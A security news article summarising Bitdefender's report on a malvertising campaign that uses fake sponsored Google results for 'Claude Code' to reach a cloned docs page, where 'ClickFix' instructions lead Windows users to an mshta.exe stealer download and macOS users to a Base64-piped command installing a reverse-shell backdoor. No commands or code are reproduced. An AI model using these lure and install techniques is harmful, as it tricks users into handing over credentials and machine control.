The Claude Code Trap: Bitdefender Unmasks Fake Google Ads Hijacking Developer Terminals
Ddos 
Cybersecurity researchers at Bitdefender have uncovered a high-stakes “maladvertisement” campaign specifically designed to ensnare developers and AI enthusiasts. The campaign exploits the rising popularity of Claude, the large language model (LLM) from Anthropic, by placing malicious sponsored links at the top of search results.
The attack begins when users search for developer tools like “Claude Code”. To the untrained eye, the top result looks perfectly legitimate, complete with official branding and Google’s “Sponsored” badge of trust.
However, instead of reaching Anthropic’s official site, users are redirected to a fake documentation page hosted on a Squarespace subdomain. As Bitdefender notes: “The page copies the real Claude Code Docs layout, navigation structure and styling. Nothing looks suspicious or out of place”.
The trap relies on a social engineering tactic called “ClickFix,” which tricks victims into manually running terminal commands that they believe are for installation, but are actually malicious.
The campaign is uniquely dangerous because it provides custom infection paths depending on the visitor’s operating system:
- Windows Users: Victims are instructed to run a command using mshta.exe, a legitimate Microsoft utility. This triggers the download of a multi-stage payload that includes a powerful credential stealer. Bitdefender identifies these threats as Trojan.Stealer.GJ and Trojan.Stealer.GK.
- macOS Users: The site presents a complex, obfuscated shell command that pipes decoded Base64 strings directly into the terminal. This results in the silent execution of a Mach-O backdoor.
“The system retrieves a Mach-O binary… The script removes extended attributes, grants execution rights, and launches the binary… The malware executes silently,” the report warns.
Technical analysis reveals that the macOS malware is highly sophisticated, utilizing heavy string obfuscation and arithmetic-based decryption loops to hide its purpose. Once active, it acts as a reverse shell, allowing attackers to remotely spawn /bin/bash or /bin/zsh sessions and take full control of the infected machine.
To bypass Google’s ad scrutiny, the attackers did not create new accounts. Instead, they likely “abused a compromised advertiser account linked to a Malaysian company” that already possessed a history of trust with Google’s platform. Google has since deactivated the compromised account.
Support Our Threat Intelligence
If you find our CVE report and cybersecurity news helpful, consider supporting our work.
Buy Me a Coffee
PayPal
